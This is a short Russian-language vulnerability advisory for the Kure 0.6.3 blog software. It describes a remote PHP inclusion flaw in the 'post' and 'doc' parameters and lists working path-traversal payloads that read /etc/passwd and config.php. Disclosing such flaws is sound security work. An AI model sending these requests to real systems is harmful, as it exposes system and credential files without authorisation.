Программа: Kure 0.6.3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметрах «post» и «doc». Удаленный пользователь может
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.

Эксплоит:

LFI /etc/passwd:

/?post=../../../../../../../../../../../../../etc/passwd%00
/?doc=../../../../../../../../../../../../../etc/passwd%00

LFI /config.php:

/?post=../config.php%00
/?doc=../config.php%00



Оставить мнение